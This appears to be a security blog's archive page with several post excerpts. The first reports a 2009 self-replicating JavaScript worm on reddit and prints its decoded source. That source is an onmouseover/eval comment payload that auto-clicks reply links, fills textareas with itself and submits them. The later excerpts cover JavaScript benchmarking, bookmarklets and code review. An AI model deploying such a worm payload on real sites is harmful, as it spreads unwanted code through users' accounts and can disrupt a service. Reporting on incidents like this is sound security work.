Today when reddit was down for maintenance people kept gathering on the #redditdowntime channel on freenode where under a couple of minutes intriguing things started to happen.
You can read the whole story here (and come back afterwards).
(continue)
As I am writing this a javascript worm is having fun spreading on reddit. For one part we should be happy it only spreads and does not do anything else (you now, like cookie theft). On the other hand, it may be an attempt to DDoS reddit, because I’m suddenly starting to get error pages…
An error occurred while processing your request.
Reference #97.27c37259.1254106488.35b1d0e
The (decoded) code of the worm is the following:
// generate payload/attack vector
// having trouble understanding why this works
z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";
// and what's with the 9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d ?
// "click" all reply links in page
o=document;
e=o.getElementsByTagName('a');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='reply')
$(e[i]).click();
// fill with payload
o=document;
e=o.getElementsByTagName('textarea');
for(i=0;i<e.length;i++)
e[i].value=z;
// submit
e=o.getElementsByTagName('button');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='save'&&e[i].style.display!='none')
$(e[i]).click();
In the meantime of writing the article I tried to look for the invalid filtering in the source code, but as touching for the first time the code had no sense of direction. If someone would be kind enough to enlighten me in which file the code resides I’d be more than happy.
If not, we’ll have an unsolved mystery :)
UPDATE: worm author has happily shared its way of evading the filter.
UPDATE 2: post about the bug on the reddit blog.
There are a series of ways by which you could benchmark Javascript code. Either by using the Firebug console API, example:
console.time("first");
// some javascript code
console.timeEnd("first");
Another way would be the one which ppk suggested on his blog.
function testIt() {
var startTime = new Date().getTime();
// actual DOM functionality to be tested goes here
setTimeout(function () {
var endTime = new Date().getTime();
var result = (endTime-startTime)/1000;
// print result
},10)
}
The reason why the result is printed through a different function set to run on timeout is:
(…) some browsers only applies the result of the test (i.e. the changes in the DOM you want to test) to the screen after the function has ended entirely. (…) The correct way of conducting this test is setting a timeout for reading out the end time. The function ends when the in-memory DOM manipulation has been done, which allows the browser to apply the changes.
If that’s the case, we could also use the following function for benchmarking Javascript code (a more flexible version):
function benchmark(func) {
var startTime = new Date().getTime();
func();
var endTime = new Date().getTime();
return (endTime-startTime)/1000;
}
// as for usage
time = benchmark(function() {
// javascript code to benchmark
});
It is completely unrelated to any aspect of security, but there are some topics that just make me blog about… Anyway, very soon I’ll post on, have a few projects I’m working on lately.
Some days ago while I was writing the (traffic magnet) article HYGHAAZG and mentioned the keylogger, instantly it came to mind a userscript one. Googled a bit, but didn’t seem to find any (quite amazed)…
A bookmarklet is an applet, a small computer application, stored as the URL of a bookmark in a web browser or as a hyperlink on a web page. The term is a portmanteau of the terms bookmark and applet. Whether bookmarklet utilities are stored as bookmarks or hyperlinks, they are designed to add one-click functionality to a browser or web page. When clicked, a bookmarklet performs some function, one of a wide variety such as a search query or data extraction. Usually the applet is a JavaScript program. (Wikipedia)
Code review is probably the single-most effective technique for identifying security flaws. When used together with automated tools and manual penetration testing, code review can significantly increase the cost effectiveness of an application security verification effort. (Introduction)
(continue)
How many times did you check a web application of yours with a security auditing tool?
I can tell you that I did it a couple of times. And as usual it always hit me with the same warning: ‘the login information is sent in plain text to …php’, or something of sort.
I always have been annoyed by things like: the morning alarm clock, long distance travels, undocumented functions and spam. But from all the above mentioned spam as well may be the most annoying one from it, the rest of them don’t happen that often.
(continue)